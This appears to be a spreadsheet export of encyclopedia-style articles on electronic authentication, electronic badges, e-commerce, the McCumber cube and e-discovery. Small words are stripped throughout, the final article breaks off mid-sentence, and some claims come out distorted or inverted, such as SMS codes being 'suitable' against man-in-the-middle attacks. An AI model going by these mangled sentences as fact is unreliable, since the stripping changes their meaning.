factors. this known multi-factor authentication, two-factor authentication two-step verification subtypes. multi-factor authentication still vulnerable attacks, including man-in-the-middle attacks trojan attacks. methods token tokens generically something claimant possesses controls used authenticate claimant's identity. e-authentication, claimant authenticates system application network. therefore, token used e-authentication secret token must protected. token may, example, cryptographic key, protected encrypting password. impostor must steal encrypted learn password token. passwords pin-based authentication passwords pins categorized "something know" method. combination numbers, symbols, mixed cases considered stronger all-letter password. also, adoption transport layer security (tls) secure socket layer (ssl) features information transmission process well create encrypted channel data exchange protect information delivered. currently, security attacks target password-based authentication systems. public-key authentication this type authentication parts. public key, private key. public issued certification authority available user server. private known user only. symmetric-key authentication user shares unique authentication server. when user sends randomly generated message (the challenge) encrypted secret authentication server, message matched server using shared secret key, user authenticated. when implemented together password authentication, method also provides possible solution two-factor authentication systems. sms-based authentication user receives password reading message cell phone, types back password complete authentication. short message service (sms) effective cell phones commonly adopted. also suitable man-in-the-middle (mitm) attacks, since involve internet. biometric authentication biometric authentication unique physical attributes body measurements intermediate better identification access control. physical characteristics often used authentication include fingerprints, voice recognition, face recognition, iris scans unique every individual. traditionally, biometric authentication based token-based identification systems, passport, nowadays becomes secure identification systems user protections. technological innovation provides wide variety either behavioral physical characteristics defining proper concept biometric authentication. digital identity authentication digital identity authentication refers combined device, behavior, location data, including email address, account credit card information, authenticate online users real time. example, recent work explored exploit browser fingerprinting part multi-factor authentication scheme, electronic credentials paper credentials documents attest identity attributes individual entity called subject credentials. some common paper credentials include passports, birth certificates, driver's licenses, employee identity cards. credentials authenticated variety ways: traditionally perhaps signature seal, special papers inks, high quality engraving, today complex mechanisms, holograms, make credentials recognizable difficult copy forge. cases, simple possession credentials sufficient establish physical holder credentials indeed subject credentials. more commonly, credentials contain biometric information subject's description, picture subject handwritten signature subject used authenticate holder credentials indeed subject credentials. when paper credentials presented in-person, authentication biometrics contained credentials checked confirm physical holder credential subject. electronic identity credentials bind name perhaps attributes token. there variety electronic credential types today, types credentials constantly created (eid, electronic voter card, biometric passports, bank cards, etc.) minimum, credentials include identifying information permits recovery records registration associated credentials name associated subscriber. verifiers authenticated on-line transaction, verifier party verifies claimant possession control token verifies identity. claimant authenticates identity verifier token authentication protocol. this called proof possession (pop). many protocols designed verifier, knowledge token authentication protocol run, learns nothing token run. verifier entity, verifier relying party entity three separate entities. undesirable verifiers learn shared secrets unless part entity registered tokens. where verifier relying party separate entities, verifier must convey result authentication protocol relying party. object created verifier convey result called assertion. authentication schemes there four types authentication schemes: local authentication, centralized authentication, global centralized authentication, global authentication application (portal). when using local authentication scheme, application retains data pertains user's credentials. this information usually shared applications. onus user maintain remember types number credentials associated service need access. this high risk scheme possibility storage area passwords might become compromised. using central authentication scheme allows user credentials access various services. each application different must designed interfaces ability interact central system successfully provide authentication user. this allows user access important information able access private keys allow electronically sign documents. using third party global centralized authentication scheme allows user direct access authentication services. this allows user access particular services need. secure scheme global centralized authentication application (portal). ideal e-government allows wide range services. uses single authentication mechanism involving minimum factors allow access required services ability sign documents. authentication digital signing working together often, authentication digital signing applied conjunction. advanced electronic signatures, signatory authenticated uniquely linked signature. case qualified electronic signature defined eidas-regulation, signer's identity even certified qualified trust service provider. this linking signature authentication firstly supports probative value signature commonly referred non-repudiation origin. protection message network-level called non-repudiation emission. authenticated sender message content linked other. party tries change message content, signature loses validity. risk assessment when developing electronic systems, industry standards requiring united states agencies ensure transactions provide appropriate level assurance. generally, servers adopt office management budget's (omb's) e-authentication guidance federal agencies (m-04-04) guideline, published help federal agencies provide secure electronic services protect individual privacy. asks agencies check whether transactions require e-authentication, determine proper level assurance.it established four levels assurance:assurance level little confidence asserted identity's validity. assurance level some confidence asserted identity's validity. assurance level high confidence asserted identity's validity. assurance level very high confidence asserted identity's validity. determining assurance levels proposes five-step process determine appropriate assurance level applications: conduct risk assessment, measures possible negative impacts. compare five assurance levels decide suits case. select technology according technical guidance issued nist. confirm selected authentication process satisfies requirements. reassess system regularly adjust changes.the required level authentication assurance assessed factors below: inconvenience, distress, damage standing reputation; financial loss agency liability; harm agency programs public interests; unauthorized release sensitive information; personal safety; and/or civil criminal violations. determining technical requirements national institute standards technology (nist) guidance defines technical requirements four levels assurance following areas: tokens used proving identity. passwords symmetric cryptographic keys private information verifier needs protect. asymmetric cryptographic keys private (which subscriber knows) related public key. identity proofing, registration, delivery credentials bind identity token. this process involve distance operation. credentials, tokens, authentication protocols also combined together identify claimant fact claimed subscriber. assertion mechanism involves either digital signature claimant acquired directly trusted third party secure authentication protocol. guidelines regulations triggered growth cloud solutions online transactions, person-to-machine machine-to-machine identities play significant role identifying individuals accessing information. according office management budget u.s, million spent identity management solutions 2013 2014.governments e-authentication systems offer services reduce time people traveling government office. services ranging applying visas renewing driver's licenses achieved efficient flexible way. infrastructure support e-authentication regarded important component successful e-government. poor coordination poor technical design might major barriers electronic authentication.in several countries established nationwide common e-authentication schemes ease reuse digital identities different electronic services. other policy initiatives included creation frameworks electronic authentication, order establish common levels trust possibly interoperability different authentication schemes. united states e-authentication centerpiece united states government's effort expand electronic government, e-government, making government effective efficient easier access. e-authentication service enables users access government services online using log-in (identity credentials) sites user government trust. e-authentication government-wide partnership supported agencies comprise federal council. united states general services administration (gsa) lead agency partner. e-authentication works association trusted credential issuer, making necessary user issuer's site obtain authentication credentials. those credentials e-authentication transferred supporting government site causing authentication. system created response december 2003 memorandum issued office management budget. memorandum m04-04 whitehouse. that memorandum updates guidance issued paperwork elimination 1998, u.s.c. 3504 implements section e-government act, u.s.c. nist provides guidelines digital authentication standards away knowledge-based authentication methods. stricter standard drafted complicated passwords least characters long passphrases least characters long. europe europe, eidas provides guidelines used electronic authentication regards electronic signatures certificate services website authentication. once confirmed issuing member state, participating states required accept user's electronic signature valid cross border transactions. under eidas, electronic identification refers material/immaterial unit contains personal identification data used authentication online service. authentication referred electronic process allows electronic identification natural legal person. trust service electronic service used create, verify validate electronic signatures, addition creating, verifying validating certificates website authentication. article eidas allows authentication mechanism used natural legal person electronic identification methods confirming identity relying party. annex provides requirements qualified certificates website authentication. russia e-authentication centerpiece russia government's effort expand e-government, making government effective efficient easier russian people access. e-authentication service enables users access government services online using log-in (identity credentials) already sites government trust. other applications apart government services, e-authentication also widely used technology industries. these applications combine features authorizing identities traditional database technology provide secure diverse e-authentication. some examples described below. mobile authentication mobile authentication verification user's identity mobile device. treated independent field also applied multifactor authentication schemes e-authentication field.for mobile authentication, five levels application sensitivity level level level public mobile device requires identity authentications, level multi-procedures identify users. either level, mobile authentication relatively easy process. firstly, users send one-time password (otp) offline channels. then, server identifies information makes adjustment database. since user access code send information mobile devices, risk attacks. e-commerce authentication early 1980s, electronic data interchange (edi) systems implemented, considered early representative e-commerce. ensuring security significant issue since systems constructed around closed networks. however, recently, business-to-consumer transactions transformed. remote transacting parties forced implementation e-commerce authentication systems.generally speaking, approaches adopted e-commerce authentication basically e-authentication. difference e-commerce authentication narrow field focuses transactions customers suppliers. simple example e-commerce authentication includes client communicating merchant server internet. merchant server usually utilizes server accept client requests, database management system manage data payment gateway provide online payment services. self-sovereign identity with self-sovereign identity (ssi) individual identity holders fully create control credentials. whereas verifiers authenticate provided identities decentralized network. perspectives keep evolution services digital world, continued need security mechanisms. while passwords continue used, important rely authentication mechanisms, importantly multifactor authentication. usage e-signatures continues significantly expand throughout united states, throughout world, expectation regulations eidas eventually amended reflect changing conditions along regulations united states. references external links government e-authentication website e-authentication directive memo randum m04-04 digid common, digital identity implementedthe dutch administration 'gbo.overheid' (gemeenschappelijke beheerorganisatie) cartão cidadão portuguese document enables holder securely identify him/herself physical digital world electronic authentication animations –common authentication methods (script) electronic authentication: guidance selecting secure techniques nascio you? really wanna know: e-authentication privacy implications electronic authentication guideline(special publication 800-63-2), august 2013 national strategy trusted identities cyberspace (nstic)</t>
  </si>
  <si>
    <t>Electronic badge</t>
  </si>
  <si>
    <t>electronic badge electronic conference badge) gadget replacement traditional paper-based badge pass issued public events. mainly handed computer (security) conferences hacker events. their main feature display name attendee, electronic nature include variety software. badges originally tradition con, spread across different events. examples hardware sha2017 badge, included e-ink screen esp32 card10 cccamp2019 electromagnetic field camp badge software organization badge.team developed platform called "hatchery" publish develop software several badges. references</t>
  </si>
  <si>
    <t>Electronic commerce</t>
  </si>
  <si>
    <t>e-commerce (electronic commerce) activity electronically buying selling products online services internet. e-commerce draws technologies mobile commerce, electronic funds transfer, supply chain management, internet marketing, online transaction processing, electronic data interchange (edi), inventory management systems, automated data collection systems. e-commerce turn driven technological advances semiconductor industry, largest sector electronics industry. defining e-commerce term coined first employed robert jacobson, principal consultant california state assembly's utilities commerce committee, title text california's electronic commerce act, carried late committee chairwoman gwen moore (d-l.a.) enacted 1984. e-commerce typically uses least part transaction's life cycle although also technologies e-mail. typical e-commerce transactions include purchase products (such books amazon) services (such music downloads form digital distribution itunes store). there three areas e-commerce: online retailing, electronic markets, online auctions. e-commerce supported electronic business. existence value e-commerce allow consumers shop online online internet, saving time space customers enterprises, greatly improving transaction efficiency, especially busy office workers, also saving valuable time.e-commerce businesses also employ following: online shopping retail sales direct consumers sites mobile apps, conversational commerce live chat, chatbots, voice assistants; providing participating online marketplaces, process third-party business-to-consumer (b2c) consumer-to-consumer (c2c) sales; business-to-business (b2b) buying selling; gathering using demographic data contacts social media; electronic data interchange; marketing prospective established customers e-mail (for example, newsletters); engaging pretail launching products services; online financial exchanges currency exchanges trading purposes.there five essential categories e-commerce: business business business consumer business government consumer business consumer consumer forms contemporary electronic commerce classified categories. first category business based types goods sold (involves everything ordering "digital" content immediate online consumption, ordering conventional goods services, "meta" services facilitate types electronic commerce). second category based nature participant (b2b, b2c, c2c).on institutional level, corporations financial institutions internet exchange financial data facilitate domestic international business. data integrity security pressing issues electronic commerce. aside traditional e-commerce, terms m-commerce (mobile commerce) well (around 2013) t-commerce also used. governmental regulation united states, california's electronic commerce (1984), enacted legislature, recent california privacy rights (2020) enacted popular election proposition, control specifically electronic commerce conducted california. entirety, electronic commerce activities regulated broadly federal trade commission (ftc). these activities include commercial e-mails, online advertising consumer privacy. can-spam 2003 establishes national standards direct marketing e-mail. federal trade commission regulates forms advertising, including online advertising, states advertising must truthful non-deceptive. using authority section act, prohibits unfair deceptive practices, brought number cases enforce promises corporate privacy statements, including promises security consumers' personal information. result, corporate privacy policy related e-commerce activity subject enforcement ftc. ryan haight online pharmacy consumer protection 2008, came 2008, amends controlled substances address online pharmacies.conflict laws cyberspace major hurdle harmonization legal framework e-commerce around world. order give uniformity e-commerce around world, many countries adopted uncitral model electronic commerce (1996).internationally international consumer protection enforcement network (icpen), formed 1991 informal network government customer fair trade organisations. purpose stated find ways co-operating tackling consumer problems connected cross-border transactions goods services, help ensure exchanges information among participants mutual benefit understanding. from came econsumer.gov, icpen initiative since april 2001. portal report complaints online related transactions foreign companies. there also asia pacific economic cooperation (apec) established 1989 vision achieving stability, security prosperity region free open trade investment. apec electronic commerce steering group well working common privacy regulations throughout apec region. australia, trade covered australian treasury guidelines electronic commerce australian competition consumer commission regulates offers advice deal businesses online, offers specific advice happens things wrong.in united kingdom, financial services authority (fsa) formerly regulating authority aspects eu's payment services directive (psd), replacement 2013 prudential regulation authority financial conduct authority. implemented payment services regulations 2009 (psrs), came effect november 2009. affects firms providing payment services customers. these firms include banks, non-bank credit card issuers non-bank merchant acquirers, e-money issuers, etc. psrs created class regulated firms known payment institutions (pis), subject prudential requirements. article requires european commission report implementation impact november 2012.in india, information technology 2000 governs basic applicability e-commerce. china, telecommunications regulations people's republic china (promulgated september 2000), stipulated ministry industry information technology (miit) government department regulating telecommunications related activities, including electronic commerce. day, administrative measures internet information services released, first administrative regulation address profit-generating activities conducted internet, foundation future regulations governing e-commerce china. august 2004, eleventh session tenth standing committee adopted electronic signature law, regulates data message, electronic signature authentication legal liability issues. considered first china's e-commerce legislation. milestone course improving china's electronic commerce legislation, also marks entering china's rapid development stage electronic commerce legislation. global trends 2010, united kingdom highest capita e-commerce spending world. 2013, czech republic european country e-commerce delivers biggest contribution enterprises' total revenue. almost quarter (24%) country's total turnover generated online channel.among emerging economies, china's e-commerce presence continues expand every year. with million internet users, china's online shopping sales reached $253 billion first half 2015, accounting total chinese consumer retail sales period. chinese retailers able help consumers feel comfortable shopping online. e-commerce transactions china countries increased trillion yuan ($375.8 billion) 2012 accounted 9.6% china's total international trade. 2013, alibaba e-commerce market share china. 2014, million internet users china (twice many us), making world's biggest online market. china also largest e-commerce market world value sales, estimated us$899 billion 2016. research shows chinese consumer motivations different enough western audiences require unique e-commerce designs instead simply porting western apps chinese market.recent research indicates electronic commerce, commonly referred e-commerce, presently shapes manner people shop products. countries rapidly growing market characterized population becomes wealthier (yuldashev). such, retailers launched arabic-language websites means target population. secondly, predictions increased mobile purchases expanding internet audience (yuldashev). growth development aspects make countries become larger players electronic commerce market time progress. specifically, research shows e-commerce market expected grow billion 2020 among countries (yuldashev). e-commerce market also gained much popularity among western countries, particular europe u.s. these countries highly characterized consumer-packaged goods (cpg) (geisler, 34). however, trends show future signs reverse. similar countries, increased purchase goods services online channels rather offline channels. activist investors trying hard consolidate slash overall cost governments western countries continue impose regulation manufacturers (geisler, 36). senses, investors forced adapt e-commerce effective well means thrive. 2013, brazil's e-commerce growing quickly retail e-commerce sales expected grow double-digit pace 2014. 2016, emarketer expected retail e-commerce sales brazil reach $17.3 billion. india internet user base million december 2017. despite third largest user base world, penetration internet compared markets like united states, united kingdom france growing much faster rate, adding around million entrants every month. india, cash delivery preferred payment method, accumulating e-retail activities. india retail market expected rise 2.5% 2016 2020.the future trends countries similar western countries. despite forces push business adapt e-commerce means sell goods products, manner customers make purchases similar countries regions. instance, increased usage smartphones comes conjunction increase overall internet audience regions. yuldashev writes consumers scaling modern technology allows mobile marketing. however, percentage smartphone internet users make online purchases expected vary first years. independent willingness people adopt trend (the statistics portal). example, greatest smartphone penetration 73.8 cent 91.9 cent population access internet. hand, smartphone penetration europe reported 64.7 cent (the statistics portal). regardless, disparity percentage regions expected level future e-commerce technology expected grow allow users. e-commerce business within regions result competition. government bodies country level enhance measures strategies ensure sustainability consumer protection (krings, al.). these increased measures raise environmental social standards countries, factors determine success e-commerce market countries. example, adoption tough sanctions make difficult companies enter e-commerce market lenient sanctions allow ease companies. such, future trends countries western countries independent sanctions (krings, al.). these countries need make rational conclusions coming effective sanctions. rate growth number internet users arab countries rapid 13.1% 2015. significant portion e-commerce market middle east comprises people 30–34 year group. egypt largest number internet users region, followed saudi arabia morocco; constitute 3/4th region's share. yet, internet penetration low: egypt saudi arabia.e-commerce become important tool small large businesses worldwide, sell customers, also engage them.cross-border e-commerce also essential field e-commerce businesses. responded trend globalization. shows numerous firms opened businesses, expanded markets, overcome trade barriers; enterprises started exploring cross-border cooperation field. addition, compared traditional cross-border trade, information cross-border e-commerce concealed. globalization, cross-border e-commerce inter-firm companies means activities, interactions, social relations e-commerce enterprises. however, success cross-border e-commerce promotes development small medium-sized firms, finally become transaction mode. helped companies solve financial problems realize reasonable allocation resources field. smes small medium enterprises) also precisely match demand supply market, industrial chain majorization creating revenues companies.in 2012, e-commerce sales topped trillion first time history.mobile devices playing increasing role e-commerce, also commonly called mobile commerce, m-commerce. 2014, estimate purchases made mobile devices making market 2017.for traditional businesses, research stated information technology cross-border e-commerce good opportunity rapid development growth enterprises. many companies invested enormous volume investment mobile applications. delone mclean model stated three perspectives contribute successful e-business: information system quality, service quality users' satisfaction. there limit time space, opportunities reach customers around world, unnecessary intermediate links, thereby reducing cost price, benefit large customer data analysis, achieve high degree personal customization strategic plan, order fully enhance core competitiveness products company.modern graphics technologies, facebook posts, considered social media marketers advertisers preferable promote consumer goods static photos, brands like sony already paving augmented reality commerce. wayfair lets inspect version furniture home setting buying. logistics logistics e-commerce mainly concerns fulfillment. online markets retailers find best possible fill orders deliver products. small companies usually control logistic operation ability hire outside company. most large companies hire fulfillment service takes care company's logistic needs. impacts impact markets retailers e-commerce markets growing noticeable rates. online market expected grow 2015–2020. 2017, retail e-commerce sales worldwide amounted trillion dollars e-retail revenues projected grow 4.891 trillion dollars 2021. traditional markets expected growth time. brick mortar retailers struggling online retailer's ability offer lower prices higher efficiency. many larger retailers able maintain presence offline online linking physical online offerings.e-commerce allows customers overcome geographical barriers allows purchase products anytime anywhere. online traditional markets different strategies conducting business. traditional retailers offer fewer assortment products shelf space where, online retailers often hold inventory send customer orders directly manufacture. pricing strategies also different traditional online retailers. traditional retailers base prices store traffic cost keep inventory. online retailers base prices speed delivery. there ways marketers conduct business e-commerce: fully online online along brick mortar store. online marketers offer lower prices, greater product selection, high efficiency rates. many customers prefer online markets products delivered quickly relatively price. however, online retailers cannot offer physical experience traditional retailers can. difficult judge quality product without physical experience, cause customers experience product seller uncertainty. another issue regarding online market concerns security online transactions. many customers remain loyal well-known retailers issue.security primary problem e-commerce developed developing countries. e-commerce security protecting business' websites customers unauthorized access, use, alteration, destruction. type threats include: malicious codes, unwanted programs ware, spyware), phishing, hacking, cyber vandalism. e-commerce websites different tools avert security threats. these tools include firewalls, encryption software, digital certificates, passwords. impact supply chain management long time, companies troubled benefits supply chain technology solutions deliver benefits. however, emergence e-commerce provided practical effective delivering benefits supply chain technologies.e-commerce capability integrate inter-company intra-company functions, meaning three flows (physical flow, financial flow information flow) supply chain could also affected e-commerce. affections physical flows improved product inventory movement level companies. information flows, e-commerce optimized capacity information processing companies used have, financial flows, e-commerce allows companies efficient payment settlement solutions.in addition, e-commerce sophisticated level impact supply chains: firstly, performance eliminated since companies identify gaps different levels supply chains electronic means solutions; secondly, result e-commerce emergence, capabilities implementing systems, like erp, xero, megaventory, helped companies manage operations customers suppliers. capabilities still fully exploited. thirdly, technology companies would keep investing e-commerce software solutions expecting investment return. fourthly, e-commerce would help solve many aspects issues companies feel difficult cope with, political barriers cross-country changes. finally, e-commerce provides companies efficient effective collaborate within supply chain. impact employment e-commerce helps create opportunities information related services, software digital products. also causes losses. areas greatest predicted job-loss retail, postal, travel agencies. development e-commerce create jobs require highly skilled workers manage large amounts information, customer demands, production processes. contrast, people poor technical skills cannot enjoy wages welfare. hand, e-commerce requires sufficient stocks could delivered customers time, warehouse becomes important element. warehouse needs staff manage, supervise organize, thus condition warehouse environment concerned employees. impact customers e-commerce brings convenience customers leave home need browse website online, especially buying products sold nearby shops. could help customers wider range products save customers' time. consumers also gain power online shopping. they able research products compare prices among retailers. also, online shopping often provides sales promotion discounts code, thus price effective customers. moreover, e-commerce provides products' detailed information; even in-store staff cannot offer detailed explanation. customers also review track order history online. e-commerce technologies transaction costs allowing manufactures consumers skip intermediaries. this achieved extending search area best price deals group purchase. success e-commerce urban regional levels depend local firms consumers adopted e-commerce.however, e-commerce lacks human interaction customers, especially prefer face-to-face connection. customers also concerned security online transactions tend remain loyal well-known retailers. recent years, clothing retailers tommy hilfiger started adding virtual platforms e-commerce sites reduce risk customers buying wrong sized clothes, although vary greatly purpose. when customer regret purchase product, involves returning goods refunding process. this process inconvenient customers need pack post goods. products expensive, large fragile, refers safety issues. impact environment 2018, e-commerce generated million tons container cardboard north america, increase million 2017. only percent north american cardboard manufacturing capacity recycled content. recycling rate europe percent asia percent. amazon, largest user boxes, strategy back packing material reduced packaging material used percent weight since 2016. amazon requiring retailers manufacture product packaging require additional shipping packaging. amazon also 85-person team researching ways reduce improve packaging shipping materials. impact traditional retail e-commerce cited major force failure major u.s. retailers trend frequently referred "retail apocalypse." rise e-commerce outlets like amazon made harder traditional retailers attract customers stores forced companies change sales strategies. many companies turned sales promotions increased digital efforts lure shoppers shutting brick-and-mortar locations. trend forced traditional retailers shutter brick mortar operations. e-commerce covid-19 march 2020, global retail website traffic 14.3 billion visits signifying unprecedented growth e-commerce lockdown 2020. later studies show online sales increased online grocery shopping increased 100% crisis united states. meanwhile, many surveyed shoppers state never back shopping person again; consumers state expect keep shopping even lockdown over.retail sales e-commerce shows covid-19 significant impact e-commerce sales expected reach $6.5 trillion 2023. business application some common applications related electronic commerce are: timeline timeline development e-commerce: 1971 1972: arpanet used arrange cannabis sale students stanford artificial intelligence laboratory massachusetts institute technology, later described "the seminal e-commerce" john markoff's book what dormouse said. 1979: michael aldrich demonstrates first online shopping system. 1981: thomson holidays first business-to-business (b2b) online shopping system installed. 1982: minitel introduced nationwide france france télécom used online ordering. 1983: california state assembly holds first hearing "electronic commerce" volcano, california. testifying cpuc, mail, prodigy, compuserve, volcano telephone, pacific telesis. (not permitted testify quantum technology, later become aol.) california's electronic commerce passed 1984. 1983: karen earle lile (aka karen bean) kendall ross bean create e-commerce service francisco area. buyers sellers pianos connect database created piano finders kaypro personal computer using interface. pianos sale listed bulletin board system. buyers print list pianos sale matrix printer. customer service happened piano advice hotline listed francisco chronicle classified money transferred bank wire transfer sale completed. 1984: gateshead sis/tesco first online shopping system snowball, first online home shopper 1984: april 1984, compuserve launches electronic mall canada. first comprehensive electronic commerce service. 1989: 1989, sequoia data corp. introduced compumarket, first internet based system e-commerce. sellers buyers could post items sale buyers could search database make purchases credit card. 1990: berners-lee writes first browser, worldwideweb, using next computer. 1992: book stacks unlimited cleveland opens commercial sales website (www.books.com) selling books online credit card processing. 1993: paget press releases edition first store, electronic appwrapper 1994: netscape releases navigator browser october code name mozilla. netscape introduced late 1994 encryption made transactions secure. 1994: ipswitch imail server becomes first software available online sale immediate download partnership ipswitch, inc. openmarket. 1994: "ten summoner's tales" sting becomes first secure online purchase netmarket. 1995: national science foundation lifts former strict prohibition commercial enterprise internet. 1995: thursday april 1995, purchase book paul stanfield, product manager compuserve smith's shop within compuserve's shopping centre uk's first national online shopping service secure transaction. shopping service launch featured smith, tesco, virgin megastores/our price, great universal stores (gus), interflora, dixons retail, past times, world (retailer) innovations. 1995: amazon launched jeff bezos. 1995: ebay founded computer programmer pierre omidyar auctionweb. first online auction site supporting person-to-person transactions. 1995: first commercial-free 24-hour, internet-only radio stations, radio netradio start broadcasting. 1996: excalibur replicated "storefronts" early implementation electronic commerce started group sysops australia replicated global partner sites. 1998: electronic postal stamps purchased downloaded printing web. 1999: alibaba group established china. business.com sold us$7.5 million ecompanies, purchased 1997 us$149,000. peer-to-peer filesharing software napster launches. stores launches sell decorative items home online. 1999: global e-commerce reaches $150 billion 2000: dot-com bust. 2001: ebay largest userbase e-commerce site. 2001: alibaba.com achieved profitability december 2001. 2002: ebay acquires paypal $1.5 billion. niche retail companies wayfair netshops founded concept selling products several targeted domains, rather central portal. 2003: amazon posts first yearly profit. 2004: dhgate.com, china's first online transaction platform, established, forcing sites move away "yellow pages" model. 2007: business.com acquired r.h. donnelley $345 million. 2014: e-commerce online retail sales projected reach $294 billion, increase percent 2013 retail sales. alibaba group largest initial public offering ever, worth billion. 2015: amazon accounts half e-commerce growth, selling almost million sku's 2017: retail e-commerce sales across world reaches $2.304 trillion, 24.8 percent increase previous year. 2017: global e-commerce transactions generate $29.267 trillion, including $25.516 trillion business-to-business (b2b) transactions $3.851 trillion business-to-consumer (b2c) sales. 2020: government india launched bhim digital payment interface 2016. year 2020 billion digital payment transactions. also references further reading external links e-commerce resources, small business administration, archived original 2017</t>
  </si>
  <si>
    <t>McCumber cube</t>
  </si>
  <si>
    <t>1991, john mccumber created model framework establishing evaluating information security (information assurance) programs, known mccumber cube. this security model depicted three-dimensional rubik's cube-like grid. concept model that, developing information assurance systems, organizations must consider interconnectedness different factors impact them. devise robust information assurance program, must consider security goals program (see below), also goals relate specifically various states information reside system full range available security safeguards must considered design. mccumber model helps remember consider important design aspects without becoming focused particular (i.e., relying exclusively technical controls expense requisite policies end-user training). dimensions attributes desired goals confidentiality: assurance sensitive information intentionally accidentally disclosed unauthorized individuals. integrity: assurance information intentionally accidentally modified call question reliability. availability: ensuring authorized individuals timely reliable access data resources needed. information states storage: data rest (dar) information system, stored memory magnetic tape disk. transmission: transferring data information systems also known data transit (dit). processing: performing operations data order achieve desired objective. safeguards policy practices: administrative controls, management directives, provide foundation information assurance implemented within organization. (examples: acceptable policies incident response procedures) also referred operations. human factors: ensuring users information systems aware roles responsibilities regarding protection information systems capable following standards. (example: end-user training avoiding computer virus infections recognizing social engineering tactics) also referred personnel technology: software hardware-based solutions designed protect information systems (examples: anti-virus, firewalls, intrusion detection systems, etc.) motivation john mccumber's website, idea push back advance security support structured methodology functions independent technology evolution. basis methodology inter-relationship among confidentiality, integrity availability storage, transmission processing applying policy, procedures, human side technology. also triad defense depth (computing) references assessing managing security risk systems: structured methodology john mccumber (author) [publisher: auerbach publications; edition (june 2004)]</t>
  </si>
  <si>
    <t>Electronic discovery</t>
  </si>
  <si>
    <t>electronic discovery (also ediscovery e-discovery) refers discovery legal proceedings litigation, government investigations, freedom information requests, information sought electronic format (often referred electronically stored information esi). electronic discovery subject rules civil procedure agreed-upon processes, often involving review privilege relevance data turned requesting party. electronic information considered different paper information intangible form, volume, transience persistence. electronic information usually accompanied metadata found paper documents play important part evidence (e.g. date time document written could useful copyright case). preservation metadata electronic documents creates special challenges prevent spoliation. united states, federal level, electronic discovery governed common law, case specific statutes, primarily federal rules civil procedure (frcp), including amendments effective december 2006, december 2015. addition, state regulatory agencies increasingly also address issues relating electronic discovery. other jurisdictions around world also rules relating electronic discovery, including part civil procedure rules england wales. stages process electronic discovery reference model (edrm) ubiquitous diagram represents conceptual view stages involved ediscovery process. identification identification phase potentially responsive documents identified analysis review. united states, zubulake warburg, hon. shira scheindlin ruled failure issue written legal hold notice whenever litigation reasonably anticipated deemed grossly negligent. this holding brought additional focus concepts legal holds, ediscovery, electronic preservation. custodians possession potentially relevant information documents identified. ensure complete identification data sources, data mapping techniques often employed. since scope data overwhelming uncertain phase, attempts made reasonably reduce overall scope phase limiting identification documents certain date range custodians. preservation duty preserve begins upon reasonable anticipation litigation. during preservation, data identified potentially relevant placed legal hold. this ensures data cannot destroyed. care taken ensure process defensible, end-goal reduce possibility data spoliation destruction. failure preserve lead sanctions. even court ruled failure preserve negligence, force accused fines lost data puts defense undue disadvantage establishing defense." collection once documents preserved, collection begin. collection transfer data company legal counsel, determine relevance disposition data. some companies deal frequent litigation software place quickly place legal holds certain custodians event (such legal notice) triggered begin collection process immediately. other companies need call digital forensics expert prevent spoliation data. size scale collection determined identification phase. processing during processing phase, native files prepared loaded document review platform. often, phase also involves extraction text metadata native files. various data culling techniques employed phase, deduplication de-nisting. sometimes native files converted petrified, paper-like format (such tiff) stage, allow easier redaction bates-labeling. modern processing tools also employ advanced analytic tools help document review attorneys accurately identify potentially relevant documents. review during review phase, documents reviewed responsiveness discovery requests privilege. different document review platforms assist many tasks related process, including rapid identification potentially relevant documents, culling documents according various criteria (such keyword, date range, etc.). most review tools also make easy large groups document review attorneys work cases, featuring collaborative tools batches speed review process eliminate work duplication. production documents turned opposing counsel, based agreed-upon specifications. often production accompanied load file, used load documents document review platform. documents produced either native files, petrified format (such tiff), alongside metadata. types electronically stored information data stored electronic form subject production common ediscovery rules. this type data historically included email office documents, also include photos, video, databases, filetypes. also included ediscovery "raw data", forensic investigators review hidden evidence. original file format known "native" format. litigators review material ediscovery several formats: printed paper, "native file", petrified, paper-like format, files tiff images. modern document review platforms accommodate native files, allow converted tiff bates-stamped court. electronic messages 2006, u.s. supreme court's amendments federal rules civil procedure created category electronic records that, first time, explicitly named emails instant message chats likely records archived produced relevant. type preservation problem arose zubulake warburg lawsuit. throughout case, plaintiff claimed evidence needed prove case existed emails stored ubs' computer systems. because emails requested either never found destroyed, court found likely existed not. court found corporation's counsel directed potential discovery evidence, including emails, preserved, staff directive applied follow through. this resulted significant sanctions ubs. some archiving systems apply unique code archived message chat establish authenticity. systems prevent alterations original messages, messages cannot deleted, messages cannot accessed unauthorized persons. formalized changes federal rules civil procedure december 2006 2007 effectively forced civil litigants compliance mode respect proper retention management electronically stored information (esi). improper management result finding spoliation evidence imposition sanctions including adverse inference jury instructions, summary judgment, monetary fines, sanctions. cases, qualcomm broadcom, attorneys brought bar. databases structured data structured data typically resides databases datasets. organized tables columns rows along defined data types. common relational database management systems (rdbms) capable handling large volumes data oracle, db2, microsoft server, sybase, teradata. structured data domain also includes spreadsheets (not spreadsheets contain structured data, data organized database-like tables), desktop databases like filemaker microsoft access, structured flat files, files, data marts, data warehouses, etc. audio voicemail often discoverable electronic discovery rules. employers duty retain voicemail anticipation litigation involving employee. data voice assistants like amazon alexa siri used criminal cases. reporting formats although petrifying documents static image formats (tiff jpeg) become standard document review method almost decades, native format review increased popularity method document review since around 2004. because requires review documents original file formats, applications toolkits capable opening multiple file formats also become popular. this also true (enterprise content management) storage markets converging quickly technologies. petrification involves conversion native files image format require native applications. this useful redaction privileged sensitive information, since redaction tools images traditionally mature, easier apply uniform image types non-technical people. efforts redact similarly petrified files incompetent personnel resulted removal redacted layers exposure redacted information, social security numbers private information.traditionally, electronic discovery vendors contracted convert native files tiff images (for example images 10-page microsoft word document) load file image-based discovery review database applications. increasingly, database review applications embedded native file viewers tiff-capabilities. with native image file capabilities, could either increase decrease total necessary storage, since multiple formats files associated individual native file. deployment, storage, best practices becoming especially critical necessary maintain cost-effective strategies. structured data often produced delimited text format. when number tables subject discovery large relationships tables essence, data produced native database format database backup file. common issues number different people involved electronic discovery project: lawyers parties, forensic specialists, managers, records managers, amongst others. forensic examination often uses specialized terminology (for example "image" refers acquisition digital media) lead confusion.while attorneys involved case litigation best understand companies organization represent, fail understand policies practices place company's department. result, data destroyed legal hold issued unknowing technicians performing regular duties. combat trend, many companies deploying software properly preserves data across network, preventing inadvertent data spoliation. given complexities modern litigation wide variety information systems market, electronic discovery often requires professionals attorney's office vendor) parties litigation communicate directly address technology incompatibilities agree production formats. failure expert advice knowledgeable personnel often leads additional time unforeseen costs acquiring technology adapting existing technologies accommodate collected data. emerging trends alternative collection methods currently main approaches identifying responsive material custodian machines are: physical access organizations network possible agents installed custodian machine push large 